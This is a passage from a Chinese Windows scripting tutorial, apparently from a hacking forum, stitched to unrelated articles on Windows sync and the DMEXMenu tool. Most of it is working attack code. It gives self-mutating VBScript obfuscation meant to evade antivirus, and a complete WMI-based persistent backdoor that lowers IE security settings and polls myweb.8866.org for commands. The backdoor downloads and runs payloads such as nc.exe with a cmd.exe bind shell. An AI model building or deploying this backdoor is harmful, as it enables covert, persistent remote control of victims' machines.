str=”tpircsw“” ohce.ar:“”!KOezimodnni=yek:8*dnr(trts:)2+ts:ver=alper=r,rts(ec)43(rhc43(rhc,3(rhc+)tes:))4rc=osa jboetaeDA“”(tcertS.BDOw:)“”maeosa hti:nepo.:tetirw.ts“” txerhc+“”=rts+)43(3(rhc+rek:“”+)4tsc+“”=y+)yek(rr=rts:“”cexe:verts etuitcnuf:(ver noi rof:)l ot 1=)rts(nek pets =ver:yerts+veresreverts(dim(yek,i,rtxen:))uf dne:“”noitcntevas.:w elifo.tpircsftpircsemanllu dne:2,htiw“:key=7:str=rev:execute str:function rev():for i=1 to len(str) step key:rev=rev+strreverse(mid(str,i,key)):next:end function
再执行,又变成其他样子了。这个脚本是自变形的。
如果仔细看代码就会发现,“壳”的算法依旧,而“种子”随机改变。但是,加壳过的内容每次不同了,“壳”本身还是没有任何改变。很多exe加壳工具加的壳,本身就被当作恶意代码来提取特征码。为了更好的反查杀,脚本的“壳”也需要动态改变。这就要用到所谓的多态技术。不过,exe的多态是用来反动态查杀的,而脚本的“多态”只是应付静态查杀,两者有很大不同。
对于exe,真正的多态目前还未听说被实现的。脚本也只能做多少算多少。
不影响功能的变形方法,除了上面提到的3种,还有:
1,随机改变大小写;
2,冒号(:)与回车符随机互换(字符串内和”then“之后的冒号除外);
3,字符串分割时,”+“与”&“随机互换;
4,()+-*/&,等字符两边任意添加空格或续行符(_)和回车符的组合;
5,用自定义函数替换内置函数;即使自定义的函数只是简单的封装内置函数,但至少改变了关键字的位置。
…………
还有其他“多态”算法有待你的研究。
这些算法的应用,是以大幅增加代码长度为前提的。如果想写一个比较完美的“壳”,相信会涉及到“文法分析”的知识,因为脚本要“读懂”自己,从而达到类似Java混淆器的效果,这就很复杂了,有机会再和大家探讨。下面我们应用“语句分割”、“变量名自动改变”、“随机大小写”、“+和&互换”四种方法,看一下效果如何:
A001=”wscript.echo “”OK!“”:A004=chr(34):randomize:A005=int(rnd*24000+40960):A001=A006(A001):A000=A005 mod 10+2:A001=replace(A002,A004,A004&A004):set A007=createobject(“”ADODB.Stream“”):A007.open:A007.writetext hex(A005+1)&“”=“”&A004&A001&A004&A008(“”:execute “”&A004&A006(“”A000=“”&A000&“”:A001=A002:execute A001:function A002():for A003=1 to len(A001) step A000:A002=A002+strreverse(mid(A001,A003,A000)):next:end function“”)&A004):A007.savetofile wscript.scriptfullname,2:function A006(A009):for A00A=0 to 12:A009=replace(A009,hex(&HA000+A00A),hex(A005+A00A)):next:A006=A009:end function:function A008(A009):for A00A=1 to len(A009):A00B=mid(A009,A00A,1):if int(rnd*2-1) then A00B=ucase(A00B):end if:if A00A>11 and int(rnd*5)=0 then A008=A008&A004&chr(38+int(rnd*2)*5)&A004:end if:A008=A008&A00B:next:end function“:A000=1:A001=A002:execute A001:function A002():for A003=1 to len(A001) step A000:A002=A002+strreverse(mid(A001,A003,A000)):next:end function
(注意,其中没有回车符)
上面是“原版”的,保存为vbs文件双击运行,还是弹出对话框显示”OK!“。再看代码变形成什么样了(效果是随机的):
B906=”tpircsw“” ohce.9B:“”!KO(rhc=90nar:)43:ezimodni=A09B2*dnr(t04+00049B:)069B09B=60:)609B(9B=509B dom A09B:2+01lper=6009B(eca,909B,79B&909Btes:)90c=C09B boetaerA“”(tcejtS.BDOD:)“”maerpo.C09BC09B:netetirw.xeh txe1+A09B(B&“”=“”&)09B&909&909B&6:“”(D09Betucexe909B&“” “”(B09B&&“”=509B:“”&509B9B=609Bcexe:709B etucnuf:609B noitof:)(70=809B rel ot 1)609B(nB pets 09B:509+709B=7everrtsdim(esrB,609B(09B,809xen:))5f dne:tnoitcnu909B&)“”.C09B:)fotevascsw elics.tpirluftpir2,emanlitcnuf:B09B n)E09B(09B rof ot 0=FE09B:21calper=,E09B(eBH&(xeh09B+509(xeh,)F9B+A09Ben:))F0B09B:txe:E09B=cnuf dnuf:noit noitcn9B(D09Brof:)E01=F09B nel ot :)E09B(im=019B,E09B(d)1,F09Btni fi:-2*dnr(neht )1u=019B 9B(esacdne:)01 fi:fi 11>F09Bni dna 5*dnr(teht 0=)=D09B n9B&D09B(rhc&90(tni+83*)2*dnr909B&)5fi dne:B=D09B:19B&D09:txen:0nuf dnenoitc“:EXecUTe ”B9“&”05=7“&”:B906“&”=B907:E“+”XEc“+”utE B906“+”:FuN“&”ctIoN B9“&”07():fOr“+” B9“+”08=1 tO l“&”En(B906)“+” step B905:B907“&”=B907+“&”sTRreVErSe(MId(“&”B9“&”0“&”6,B908,B905“&”)“+”):N“+”eX“+”t“+”:eNd fUN“&”CtiOn“
眼花了没?再来一次:
F0CB=”rcsw.tpiohceKO“” F:“”!=EC0(rhc:)43dnarzimo0F:ei=FCr(tn2*dn0004904+:)06BC0FD0F=0F(0:)BCAC0FC0F=om F01 dF:2+=BC0lper(ecaCC0FC0F,0F,EF&EC)EC0tes:D0F rc=1etaeejbo“”(tcDODAtS.BmaerF:)“”.1D0nepoD0F:rw.1teti txe(xehFC0F&)1+&“”=“”EC0FC0F&0F&BF&EC(2D0xe:“”tuce&“” eEC0FD0F&F“”(0=AC00F&“”“”&ACC0F:0F=Be:CCucex etBC0Fnuf:oitc0F n)(CCrof:C0F 1=Dl otF(ne)BC0ets 0F pF:AC=CC0CC0Frts+ever(esr(dimBC0FC0F,0F,D))ACxen:ne:tuf ditcn)“”noC0F&F:)E.1D0evasifotw elircss.tppircluftmanl:2,ecnufnoitD0F 0F(0:)3D rof4D0Ft 0=21 oD0F:er=3calp0F(eh,3D&(xeC0FH0F+A,)4D(xehFC0FD0F+:))4txenD0F:0F=0e:3Df dntcnu:noicnufnoitD0F 0F(2:)3D rof4D0Ft 1=el o0F(n:)3D5D0Fdim=D0F(0F,31,4Dfi:)tni dnr(1-2*ht )F ne=5D0sacu0F(e:)5D dnei:fi0F f1>4Dna 1ni dnr(t)5*dt 0= neh2D0FD0F=0F&2c&EC3(rhni+8nr(t)2*d&)5*EC0Fdne::fi 2D0FD0F=0F&2n:5D:txe dnecnufnoit“:eXecUtE ”F“+”0CA“&”=4:F0CB“+”=“+”F0CC:eX“+”e“+”cUte F0CB“&”:F“+”UNC“+”tIOn F0CC():F“+”or“+” F0“&”CD=1 tO LEN(F0CB) sTEp F0CA:F0CC=F0CC+strR“+”Ever“+”SE“&”(mID(“+”F0CB,“+”F0CD,F0CA)):nEXT:eNd FU“&”nCTIo“&”N“
这样够了吗?――不知道。也许杀毒引擎本来就是忽略大小写的,本来就能自动连接字符串,本来就能“文法分析”……
这个“壳”有实用性吗?――没有。因为“壳”的算法太简单。“种子”A000 = A005 mod 10 + 2,所以如果不考虑自动改变的变量名,加壳后的代码只有10种样子。
如何改进这个“壳”?――当然是用更复杂的算法,更多的“多态”。
如果你有兴趣,可以先看那个“原版”的脚本代码(把冒号都替换为回车,可读性就比较好了),然后自己加强它。
当然,你也可以另起炉灶,自由展现你的创意。
【来做个后门】
在讨论脚本后门前,先要介绍一类很有用的WMI对象。事实上,这才是本节的关键。脚本后门不过是它的一个应用而已。
前面已经说过,WMI是事件驱动的。整个事件处理机制分为四个部分:
1,事件生产者(provider):负责产生事件。WMI包含大量的事件生产者。有性能计数器之类的具体的事件生产者,也有类、实例的创建、修改、删除等通用的事件生产者。
2,事件过滤器(filter):系统每时每刻都在产生大量的事件,通过自定义过滤器,脚本可以捕获感兴趣的事件进行处理。
3,事件消费者(consumer):负责处理事件。它可以是可执行程序、动态链接库(dll,由WMI服务加载)或者脚本。
4,事件绑定(binding):通过将过滤器和消费者绑定,明确什么事件由什么消费者负责处理。
事件消费者可以分为临时的和永久的两类。临时的事件消费者只在其运行期间关心特定事件并处理。永久消费者作为类的实例注册在WMI名字空间中,一直有效直到它被注销。显然,永久事件消费者更具实用性。还是来看个例子:
nslink=”winmgmts:\\.\root\cimv2:“ '只需要本地连接,所以用这种语法,不用swbemlocator对象'
set asec=getobject(nslink&”ActiveScriptEventConsumer“).spawninstance_ '创建“活动脚本事件消费者”'
asec.name=”stopped_spooler_restart_consumer“ '定义消费者的名字'
asec.scriptingengine=”vbscript“ '定义脚本语言(只能是vbscript)'
asec.scripttext=”getobject(“”winmgmts:win32_service='spooler'“”).startservice“ '脚本代码'
set asecpath=asec.put_ '注册消费者,返回其链接'
set evtflt=getobject(nslink&”__EventFilter“).spawninstance_ '创建事件过滤器'
evtflt.name=”stopped_spooler_filter“ '定义过滤器的名字'
qstr=”select * from __instancemodificationevent within 5 “ '每5秒查询一次“实例修改事件”'
qstr=qstr&”where targetinstance isa “”win32_service“” and “ '目标实例的类是win32_service'
qstr=qstr&”targetinstance.name=“”spooler“” “ '实例名是spooler'
qstr=qstr&”and targetinstance.state=“”stopped“”“ '实例的state属性是stopped'
evtflt.query=qstr '定义查询语句'
evtflt.querylanguage=”wql“ '定义查询语言(只能是wql)'
set fltpath=evtflt.put_ '注册过滤器,返回其链接'
set fcbnd=getobject(nslink&”__FilterToConsumerBinding“).spawninstance_ '创建过滤器和消费者的绑定'
fcbnd.consumer=asecpath.path '指定消费者'
fcbnd.filter=fltpath.path '指定过滤器'
fcbnd.put_ '执行绑定'
wscript.echo ”安装完成“
这个脚本的效果是:当“后台打印”服务(spooler)状态改变为停止时,消费者将进行处理――重启spooler。
先net start spooler,然后net stop spooler。最多5秒钟,spooler又会启动。
直接运行上面的脚本会出错,因为“活动脚本事件消费者”(ActiveScriptEventConsumer ASEC)默认没有被安装到root\cimv2名字空间。
用记事本打开%windir%\system32\wbem\scrcons.mof,将第一行“#pragma namespace (”\\\\.\\Root\\Default“)”删除,或者修改为“#pragma namespace (”\\\\.\\Root\\cimv2“)”。XP/没有这一行,不用修改。
然后执行下面这个命令:
C:\WINNT\system32\wbem>mofcomp.exe -N:root\cimv2 scrcons.mof
Microsoft (R) 32-bit MOF 汇编器版本 1.50.1085.0007
版权所有 (c) Microsoft Corp. -。保留所有权利。
正在分析 MOF 文件: scrcons.mof
MOF 文件分析成功
将数据储存到储备库中...
已完成!
这样就把ASEC安装到root\cimv2了。mofcomp.exe和scrcons.mof都是系统自带的。
默认将ASEC安装到root\default名字空间,而XP/2003默认已经安装到root\subscription名字空间,但由于事件过滤器不能跨名字空间捕捉事件(XP/2003可以),事件绑定也不能跨名字空间,而大部分事件都在root\cimv2产生,所以需要重新安装ASEC到事件源所在的名字空间。下面这个脚本自动完成ASEC重安装任务。
set shl=createobject(”WScript.Shell“)
set fso=createobject(”Scripting.FileSystemObject“)
path=shl.expandenvironmentstrings(”%windir%\system32\wbem\“)
set mof=fso.opentextfile(path&”scrcons.mof“,1,false,-1) 'mof都是Unicode格式的'
mofs=mof.readall
mof.close
mofs=replace(mofs,”\\Default“,”\\cimv2“,1,1) '替换默认的名字空间'
mofp=path&”asecimv2.mof“
set mof=fso.createtextfile(mofp,false,true) '创建临时mof文件'
mof.write mofs
mof.close
shl.run path&”mofcomp.exe -N:root\cimv2 “&mofp,0,true '安装到root\cimv2'
fso.deletefile(mofp)
wscript.echo ”安装完成“
注销永久事件:
nslink=”winmgmts:\\.\root\cimv2:“
myconsumer=”stopped_spooler_restart_consumer“ '指定消费者的名字'
myfilter=”stopped_spooler_filter“ '指定过滤器的名字'
set binds=getobject(nslink&”__FilterToConsumerBinding“).instances_
for each bind in binds
if strcomp(right(bind.consumer,len(myconsumer)+1),myconsumer&chr(34),1)=0 _
and strcomp(right(bind.filter,len(myfilter)+1),myfilter&chr(34),1)=0 then
getobject(”winmgmts:“&bind.consumer).delete_ '删除消费者'
getobject(”winmgmts:“&bind.filter).delete_ '删除过滤器'
bind.delete_ '删除绑定'
exit for
end if
next
wscript.echo ”卸载完成“
除了ASEC,WMI还提供其他永久事件消费者,比如SMTPEventConsumer。当系统出现异常时,可以通过它自动给管理员的信箱发信。WMITools里的WMI Event Registration用于创建、修改、删除指定名字空间里的永久事件消费者、事件过滤器和计时器事件源的实例,以及绑定或解除绑定它们。
关于事件处理机制的各个部分,在《WMI技术指南》里有详细的讲述,MSDN里当然更全面。我就点到为止了。
(看累了吧,喝口水,休息一下 ^_^)
下面开始讨论脚本后门。
WMI提供了两个计时器:__AbsoluteTimerInstruction和__IntervalTimerInstruction,分别在指定的时刻和时间间隔触发事件,注册一个过滤器来捕获计时器事件,再和ASEC绑定,我们就获得了一种少见的程序自启动的方法。而且,脚本代码完全隐藏在CIM存储库中,不以独立的文件存在,查杀比较困难。这是脚本后门的优势,但困难也不少:
1,脚本运行时,由系统自带的scrcons.exe作为脚本宿主(Windows的设计者还没有笨到用WMI服务作为脚本宿主)。这就会增加一个进程,虽然是系统正常的进程,杀毒软件拿它没辙,但还是太显眼了。所以,不能让脚本一直在后台运行,而是应该每隔一段时间启动一次,然后尽快结束。脚本结束后,scrcons.exe进程不会自动结束,必须让脚本借助WMI提供的Win32_Process对象主动终止宿主进程(煮豆燃豆萁?!)。
2,脚本的网络功能很差,基本上只能依靠Microsoft.XMLHTTP之类的对象。因此,脚本后门不能监听端口并提供cmd shell,只能反向连接到web服务器,获取控制命令。一个可行的办法是,在web服务器上放一个命令文件,脚本后门根据域名找到服务器并下载命令文件,再根据文件内容作出响应。所以,你需要一台web服务器,或者用netbox等工具建个临时服务器。当然,你不需要让服务器总是在线,需要控制脚本后门时再运行就可以了。
3,由于脚本后门间歇式运行,需要防止重复运行同一个命令。解决方法是在注册表里记录命令的长度,每次获取命令后将长度和记录做比较,如果相同则跳过,不同则覆盖并执行命令。
4,为了借助ie对象穿透防火墙,XMLHTTP对象必须在ie中被创建,这会受到Internet域安全级别的限制。即使将代码保存在html文件中再用ie打开,也不过是“我的电脑”域,创建不安全的ActiveX对象还是会弹出警告对话框。解决办法是修改注册表,临时更改安全设置。
5,WScript对象由wscript.exe或cscript.exe提供,而scrcons.exe没有提供,所以很多常用的功能,比如WScript.Sleep都不能用了。不能Sleep就无法异步使用XMLHTTP,而同步XMLHTTP可能被长时间阻塞,大大不利于后门的隐蔽。调用ping命令来延时会创建新进程,用WScript.Shell的Popup方法延时则有“咚”一声提示音。好在Microsoft.XMLHTTP的“亲戚”不少,比如Msxml2.XMLHTTP、Msxml2.ServerXMLHTTP、Msxml2.DOMDocument、WinHttp.WinHttpRequest等。最后那个可以设置超时时间,刚好满足需要。
即使有重重困难,脚本后门仍然值得挑战一下。当肉鸡上的各类木马纷纷被杀毒软件肃清后,一个24小时才运行一次的脚本后门可能是你最后的希望。
下面是一个简单的脚本后门的核心代码(没有安装功能):
cmdu=”myweb.8866.org/cmd.txt“ '从web服务器获取命令的url'
cmdw=4000 '下载超时时间4秒'
cmdl=”HKLM\SOFTWARE\Microsoft\WBEM\CIMOM\CmdLength“ '记录命令长度的键值名'
on error resume next '忽略非致命错误 '(调试时注释掉本行)
set shl=createobject(”WScript.Shell“) '虽然不能使用WScript根对象,其子对象还是可以用的'
set aso=createobject(”ADODB.Stream“)
set ie=createobject(”InternetExplorer.Application“) '使用ie绕过防火墙'
zone=”HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3“
set1=zone&”\1201“
set2=zone&”\1400“
set3=zone&”\CurrentLevel“
val1=shl.regread(set1) '保存原来的安全设置'
val2=shl.regread(set2)
val3=shl.regread(set3)
regd=”REG_DWORD“
shl.regwrite set1,0,regd '允许在Internet域运行不安全的ActiveX'
shl.regwrite set2,0,regd '允许活动脚本'
shl.regwrite set3,0,regd '设置当前Internet域安全级别为“自定义”'
ie.visible=0 ':ie.visible=1 '(调试用)
ie.navigate ”about“&”:blank“ '这里使用字符串连接纯属反论坛过滤'
ie.document.write _
”“
set whr=ie.document.script.whr() '在ie内创建WinHttpRequest对象'
whr.settimeouts cmdw,cmdw,cmdw,cmdw '设置域名解析、连接、发送和接收超时时间'
whr.open ”GET“,cmdu,true '获取命令文件'
whr.send
if not whr.waitforresponse(cmdw) then die
if whr.status>299 then die
rt=whr.responsetext ':wscript.echo rt '(调试用)
':shl.regwrite cmdl,0,regd '(调试用)
if len(rt)=shl.regread(cmdl) then die '与前一个命令的长度比较'
shl.regwrite cmdl,len(rt),regd '更新命令长度'
cmds=split(rt,vbcrlf,-1)
if ubound(cmds)<1 then die
cmdt=lcase(trim(cmds(0))) ':wscript.echo cmdt '(调试用)
aso.type=1
aso.open
cd=shl.currentdirectory&chr(92)
select case cmdt '分析命令文件类型'
case ”'vbs“ '是vbs'
execute(rt) '直接在当前脚本上下文中执行'
die
case ”:bat“ '是批处理'
aso.write whr.responsebody
aso.savetofile cd&”_.bat“,2 '保存在当前目录'
aso.close
shl.run chr(34)&cd&”_.bat“”“,0 '运行批处理'
die
case ”'wsh“ '是Windows脚本'
aso.write whr.responsebody
aso.savetofile cd&”_.vbs“,2 '保存在当前目录'
aso.close
shl.run ”cscript.exe “”“&cd&”_.vbs“”“,0 '使用cscript作为脚本宿主'
die
case ”exe“ 'exe需进一步分析'
case else die
end select
if ubound(cmds)<4 then die ':wscript.echo cmds(1) '(调试用)
whr.open ”GET“,cmds(1),true '从指定位置下载exe文件'
whr.send
if not whr.waitforresponse(cmds(2)) then die
if whr.status>299 then die
path=shl.expandenvironmentstrings(cmds(3))'展开保存路径中的环境变量'
aso.write whr.responsebody ':wscript.echo path '(调试用)
aso.savetofile path,2 '保存exe文件'
aso.close
shl.run chr(34)&path&”“” “&cmds(4),0 '执行exe'
die
sub die
ie.quit
shl.regwrite set1,val1,regd '还原Internet域安全设置'
shl.regwrite set2,val2,regd
shl.regwrite set3,val3,regd
for each ps in getobject(”winmgmts:\\.\root\cimv2:win32_process“).instances_
if lcase(ps.name)=”scrcons.exe“ then ps.terminate '自杀'
next
'wscript.echo ”die“: wscript.quit '(调试用)
end sub
取消调试语句的注释,上面这段核心代码就可以直接运行。
它将试图从myweb.8866.org上获取cmd.txt,根据里面的内容进一步行动。
cmd.txt看起来像这样:
exe //被执行的文件类型,可以是'vbs、:bat、exe或'wsh
myweb.8866.org/nc.exe //被执行的文件的下载url
4000 //下载超时时间,单位毫秒
%windir%\system32\nc.exe //文件的保存位置,支持环境变量
-L -p 1234 -e cmd.exe //命令行参数
收到上面这个命令后,脚本将从指定url下载nc.exe,保存到系统目录并运行。
如果第一行的文件类型为'vbs、'wsh或:bat,则把命令文件本身当作脚本或批处理来执行。比如:
:bat
net start telnet :启动telnet服务
del %0 :自删除
如果只是想让某台主机执行命令,可以这样:
:bat
ipconfig | find ”123.45.67.89“ && net start telnet
del %0
这样就只有ip地址为123.45.67.89的主机才会启动telnet。
'wsh和'vbs的区别是,前者保存为文件由cscript.exe调用,后者直接在脚本后门“内部”执行。
使用'vbs的好处是不用生成文件,而且可以直接利用后门中已经创建的对象,比如shl,但也因此不能用WScript根对象。
下面的'vbs命令文件把”本地帐户的共享和安全模式“由”仅来宾“改为”经典“(对XP和2003有效):
'vbs
shl.regwrite ”HKLM\SYSTEM\CurrentControlSet\Control\Lsa\forceguest“,0,”REG_DWORD“
注意,vbs和wsh前面都有一个单引号,因为整个命令文件都作为脚本执行,所以必须注释掉第一行,:bat也是一样。
使用'vbs时千万注意不要有语法错误,否则会使后门出错并停止。如果是复杂的脚本,建议使用'wsh。
将核心代码改写为单行字符串格式,就可以作为ASEC的实例安装了。改写时要注意”if“和”end if“配对以及去掉续行符。
完整的安装脚本代码如下:
'***以下为参数配置,请根据情况自行修改***'
nslink=”winmgmts:\\.\root\cimv2:“ 'ASEC所在的名字空间'
doorname=”vbscript_backdoor“ '记住后门的名字,卸载时需要'
runinterval=86400000 '每天运行一次'
cmdu=”myweb.8866.org/cmd.txt“ '命令文件的位置'
cmdw=4000 '文件下载超时时间'
cmdl=”HKLM\SOFTWARE\Microsoft\WBEM\CIMOM\CmdLength“ '保存命令长度的键值名'
'***参数配置结束***'
createobject(”WScript.Shell“).regwrite cmdl,0,”REG_DWORD“
'脚本后门核心代码'
stxt=”cmdu=“”“&cmdu&”“”:cmdw=“&cmdw&”:cmdl=“”“&cmdl&”“”:on error resume next:set shl=createobject(“”WScript.Shell“”):set aso=createobject(“”ADODB.Stream“”):set ie=createobject(“”InternetExplorer.Application“”):zone=“”HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3“”:set1=zone&“”\1201“”:set2=zone&“”\1400“”:set3=zone&“”\CurrentLevel“”:val1=shl.regread(set1):val2=shl.regread(set2):val3=shl.regread(set3):regd=“”REG_DWORD“”:shl.regwrite set1,0,regd:shl.regwrite set2,0,regd:shl.regwrite set3,0,regd:ie.visible=0:ie.navigate “”about“”&“”:blank“”:ie.document.write “”“”:with ie.document.script.whr():.settimeouts cmdw,cmdw,cmdw,cmdw:.open “”GET“”,cmdu,true:.send:if not .waitforresponse(cmdw) then die:end if:if .status>299 then die:end if:rt=.responsetext:if len(rt)=shl.regread(cmdl) then die:end if:shl.regwrite cmdl,len(rt),regd:cmds=split(rt,vbcrlf,-1):if ubound(cmds)<1 then die:end if:cmdt=lcase(trim(cmds(0))):aso.type=1:aso.open:cd=shl.currentdirectory&chr(92):select case cmdt:case “”'vbs“”:execute(rt):die:case “”:bat“”:aso.write .responsebody:aso.savetofile cd&“”_.bat“”,2:aso.close:shl.run chr(34)&cd&“”_.bat“”“”“”,0:die:case “”'wsh“”:aso.write .responsebody:aso.savetofile cd&“”_.vbs“”,2:aso.close:shl.run “”cscript.exe “”“”“”&cd&“”_.vbs“”“”“”,0:die:case “”exe“”:case else die:end select:if ubound(cmds)<4 then die:end if:.open “”GET“”,cmds(1),true:.send:if not .waitforresponse(cmds(2)) then die:end if:if .status>299 then die:end if:path=shl.expandenvironmentstrings(cmds(3)):aso.write .responsebody:aso.savetofile path,2:aso.close:shl.run chr(34)&path&“”“”“” “”&cmds(4),0:end with:die:sub die:ie.quit:shl.regwrite set1,val1,regd:shl.regwrite set2,val2,regd:shl.regwrite set3,val3,regd:for each ps in getobject(“”winmgmts:\\.\root\cimv2:win32_process“”).instances_:if lcase(ps.name)=“”scrcons.exe“” then ps.terminate:end if:next:end sub“
'配置事件消费者'
set asec=getobject(nslink&”ActiveScriptEventConsumer“).spawninstance_
asec.name=doorname&”_consumer“
asec.scriptingengine=”vbscript“
asec.scripttext=stxt
set asecpath=asec.put_
'配置计时器'
set itimer=getobject(nslink&”__IntervalTimerInstruction“).spawninstance_
itimer.timerid=doorname&”_itimer“
itimer.intervalbetweenevents=runinterval
itimer.skipifpassed=false
itimer.put_
'配置事件过滤器'
set evtflt=getobject(nslink&”__EventFilter“).spawninstance_
evtflt.name=doorname&”_filter“
evtflt.query=”select * from __timerevent where timerid=“”“&doorname&”_itimer“”“
evtflt.querylanguage=”wql“
set fltpath=evtflt.put_
'绑定消费者和过滤器'
set fcbnd=getobject(nslink&”__FilterToConsumerBinding“).spawninstance_
fcbnd.consumer=asecpath.path
fcbnd.filter=fltpath.path
fcbnd.put_
wscript.echo ”安装完成“
与前一个永久事件处理过程不同的是,脚本后门的事件源是计时器,在每个名字空间都可以实例化并触发事件。所以,不一定要将ASEC安装到root\cimv2。特别是XP/2003,ASEC默认已经安装到root\subscription,只需要相应修改nslink的值,就可以安装脚本后门了。
卸载脚本后门:
cmdl=”HKLM\SOFTWARE\Microsoft\WBEM\CIMOM\CmdLength“
createobject(”WScript.Shell“).regdelete cmdl '删除保存命令长度的键值'
nslink=”winmgmts:\\.\root\cimv2:“
doorname=”vbscript_backdoor“ '根据脚本后门的名字找到各个对象实例'
myconsumer=doorname&”_consumer“
mytimer=doorname&”_itimer“
myfilter=doorname&”_filter“
set binds=getobject(nslink&”__FilterToConsumerBinding“).instances_
for each bind in binds
if strcomp(right(bind.consumer,len(myconsumer)+1),myconsumer&chr(34),1)=0 _
and strcomp(right(bind.filter,len(myfilter)+1),myfilter&chr(34),1)=0 then
bind.delete_
exit for
end if
next
getobject(nslink&”ActiveScriptEventConsumer.Name=“”“&myconsumer&”“”“).delete_
getobject(nslink&”__IntervalTimerInstruction.TimerId=“”“&mytimer&”“”“).delete_
getobject(nslink&”__EventFilter.Name=“”“&myfilter&”“”“).delete_
wscript.echo ”卸载完成"
几点补充说明:
1,脚本后门的优势在于隐蔽,所以24小时才运行一次是合适的。不用担心因为系统关机而错过运行机会,下次启动时会补上的。
2,为了更好的反查杀,可以给脚本后门的核心代码加壳。在功能上也可以改进到接近IRC木马的程度,只不过服务端是Web服务器,不能同时养太多的马。
3,脚本后门的自启动和运行依赖于WMI服务,虽然禁用WMI服务就可以杜绝此类后门和木马,但比起通过注册表启动还是可靠的多。如果被蠕虫病毒利用,恐怕会很麻烦吧。
【结语】
Windows脚本就像万能胶,能够把独立的程序、服务、控件组合起来完成任务。脚本编程的技巧就是组合的技巧。XP和2003比2000自带更多的命令行工具,WMI也大大加强了,脚本的功能水涨船高,可以说是“只有想不到,没有做不到”。一切有待你的发掘。
最后,感谢你耐心看完本文,希望本文可以为你学习Windows脚本提供一些帮助。
欢迎来信与我交流 mailtzzzevazzz@126.com
欢迎访问幻影旅团 www.ph4nt0m.org
【参考资料】
[1] 《Windows脚本技术》 介绍Windows脚本的基础知识
download.microsoft.com/download/winscript56/Install/5.6/W982KMe/CN/scd56chs.exe
[2] WMITools 学习脚本必备,包括CIM Studio、Event Registration、Event Viewer和Object Browser四个工具
download.microsoft.com/download/.NetStandardServer/Install/V1.1/NT5XP/EN-US/WMITools.exe
[3] 《WMI技术指南》 出版社:机械工业出版社 作者:Marcin Policht
www.huachu.com.cn/itbook/itbookinfo.asp?lbbh=BH99801035
[4] 《System Administration Scripting Guide》 包含大量WMI脚本示例
www.sometips.com/soft/script_repository.chm
[5] Script. Encoder 官方脚本编码工具
download.microsoft.com/download/winscript56/Install/1.0/WIN98MeXP/CN/sce10chs.exe
[6] 微软脚本中心
www.microsoft.com/china/technet/community/scriptcenter/default.mspx
[7] 《MS Windows Script. Host 2.0 Developers Guide》
www.sometips.com/soft/wsh.zip
篇9:Windows的“同步”功能
Windows中的同步管理器可以把保存在计算机中的脱机网页文件与网络中相应的网页内容进行比较并自动更新,使两者始终保持致,并可让同一局域网内的不同计算机中的数据文件同步更新,还可以使计算机的系统时钟与Internet时间服务器的时钟保持致,下面,就让我们来看看同步管理器的这些应用。
一、脱机网页的同步
打开我的电脑,在工具栏中选择文件夹选项,其中就有对脱机文件的具体设置。为了能够使脱机网页在登录或注销计算机、计算机闲置状态时自动保持与网络同步,就要在同步设置对话框的登录/注销选项卡中选择需要同步的脱机网页,并勾选登录计算机时、从计算机注销时两个复选框,
这样就能使该脱机网页在登录或注销计算机时保持网页的同步状态。
二、文件夹的同步
如果你经常要在两台计算机之间或者使用存储设备来传输文件,那么,使用同步+公文包组合方式将会是最佳途径。因为公文包能自动将主计算机上的文件更新为修改后的版本,而不必将修改后的文件移出公文包或者删除主计算机中现有的副本文件;而同步将使所有这些步骤显得更为简单。
三、时间的同步
无论你如何调整,计算机的时间总会在段时间后与标准时间差之毫厘,甚至谬以千里。但是,如果你启用了时间同步功能,那么你的计算机系统时间就始终能与Internet时间服务器保持同步。双击任务栏中的时间图标以打开日期和时间属性对话框,切换到Internet时间选项卡,勾选自动与Internet时间服务器同步复选框,并在服务器列表中选择时间服务器,再点击立即更新按钮即可使本机时间与Internet时间服务器时钟保持一致。
篇10:DMEXMenu增强windows功能
Windows从诞生以来,一直得到众多用户的青睐,但主菜虽好,众口难调,因此网上也有不少增强Windows功能的小软件,DMEXMenu就是其中较为突出的一个,它可以增强Windows的右健菜单功能,使其不再局限于剪切、复制等操作,选中任意文件夹右击鼠标即可看到DMEXMenu的功能菜单(图1)。 一、更改文件(夹)属性 DMEXMenu可以很方便的修改文件的属性,如创建的时间、名称,设置文件(夹)的隐藏等。选中需要修改的文件(夹),右击鼠标选择“DMEX→更改文件名或日期”出现对话框(图2),勾选相应的项目就可以进行修改;其中“属性”比较特殊,是在后面的方框输入字母(RSAH)来体现属性的,“R”表示只读,“S”表示系统,“A”表示存档,“H”表示隐藏,修改完成后单击“确定”即可。 二、获取文件(夹)的名称或路径 有时为了获取文件(夹)的名称或完整路径是比较麻烦的,有了DMEXMenu一切都变得十分简单。选中文件(夹)右击选择“DMEX→复制到剪切板”,弹出如图3所示菜单,根据需要复制文件名或路径或路径文件名,然后到需要的地方“粘贴”即可。注:后面有“(8.3)”字样的,是Dos下的文件名,文件名字符数是8个字符,扩展名字符数为3。
三、快速进入DOS窗口 有时为了进入Dos下的文件夹进行一些特殊的操作,我们只有用Cd命令进行,特别是中文路径时。此时只要选中文件夹右击选择“DMEX→打开Dos窗口”即可,
注意:此操作只对文件夹有效,文件名可不行! 四、多种方式排列窗口 我们知道窗口的排列方式多种多样,使用DMEXMenu可以很方便的排列窗口,选中要排列的窗口中的任一文件(夹),右击选择“DMEX”,即可看到很多排列窗口的方式,有兴趣的朋友可以试试看。
五、快速选取文件 要想一次选中某个文件夹下的同一类型文件,可在一个文件上右击选择“DMEX→选择文件”,弹出对话框(图4),输入*.扩展名,然后单击确定即可一次选中,“额外选择”可以在已经选择了文件的基础,再次选择文件,从而可以选择多种类型的文件,十分方便。
六、快速进入文件夹 对于一些层次比较深的文件夹,我们可以为其设置为快捷盘符,便于下一次访问。选中文件夹,右击选择“DMEX→创建替换驱动器”,然后选择合适的盘符即可。如:将文件夹“D:wendangIT”盘符设置为T盘时,在资源管理器中可看到M盘,单击M盘即可进入D:wendangIT文件夹。 七、定时启动程序 使用DMEXMenu中的“间隔启动器”可以定时启动程序;选中文件(夹)右击选择“DMEX→间隔启动器”弹出对话框(图5),输入程序的名称,并且设置好程序的路径,这样系统会根据设定的间隔天数自动运行此程序。
当然了,DMEXMenu功能还远远不止这些,笔者所写只是抛砖引玉,有兴趣的朋友可以自己挖掘,相信DMEXMenu不会让你失望的。
篇11:幼儿园任务计划
一、指导思想
